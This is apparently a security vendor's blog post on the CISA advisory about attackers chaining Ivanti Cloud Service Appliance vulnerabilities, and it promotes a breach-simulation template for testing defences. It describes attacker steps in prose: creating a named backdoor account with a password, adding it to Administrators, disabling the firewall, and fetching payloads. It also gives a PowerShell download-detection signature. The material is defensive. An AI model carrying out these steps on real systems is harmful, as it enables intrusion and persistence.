On January 22, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA) in response to the exploitation of vulnerabilities in Ivanti Cloud Service Appliances during September 2024.

According to CISA and trusted third-party incident response data, threat actors chained multiple vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells in victim networks. In one confirmed compromise, the actors moved laterally to two additional servers.

The actors’ primary exploit paths were two vulnerability chains:

  1. One exploit chain leveraged CVE-2024-8963, an administrative bypass vulnerability, in conjunction with CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.
  2. The other exploited CVE-2024-8963 in conjunction with CVE-2024-9379, a SQL injection vulnerability.

All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below. According to Ivanti, these CVEs have not been exploited in version 5.0.

AttackIQ has released a new assessment template that includes the post-compromise Tactics, Techniques and Procedures (TTPs) exhibited by these adversaries to help customers test their security controls and their ability to defend against sophisticated threats.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against highly opportunistic and sophisticated adversaries whose activities remain an ongoing threat to various industry sectors worldwide.
  • Assess their security posture against activities focused on exploiting publicly exposed vulnerabilities.
  • Continuously validate detection and prevention pipelines against a threat that performs vulnerability exploitation activities.

[CISA AA25-022A] Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

This assessment template contains the post-compromise Tactics, Techniques, and Procedures (TTP) and the tools employed by the adversaries during these activities.

It is based on the Cybersecurity Advisory (CSA) released by CISA on January 22, 2025, and a report published by Fortinet on October 11, 2024.

1. Persistence

Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Create Account: Local Account: This scenario creates a new local account with the name mssqlsvc and password Msqlsvc123$% using net user.

2. Privilege Escalation

Consists of techniques that adversaries use to gain higher-level permissions on a system or network.

Account Manipulation: Additional Local or Domain Groups (T1098.007): This scenario adds a local user to the local Administrators group using the net localgroup command.

3. Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise.

Impair Defenses: Disable or Modify System Firewall (T1562.004): This scenario temporarily disables the Windows Firewall using the netsh advfirewall utility.

4. Command and Control

Consists of techniques that adversaries may use to communicate with systems under their control within a victim network.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.

Protocol Tunneling (T1572): This scenario uses the nslookup command available in Windows systems to resolve a domain via Domain Name System (DNS).

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.

2. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

2a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

Wrap-up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against a sophisticated threat. With data generated from continuous testing and the use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against sophisticated nation-state actors.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.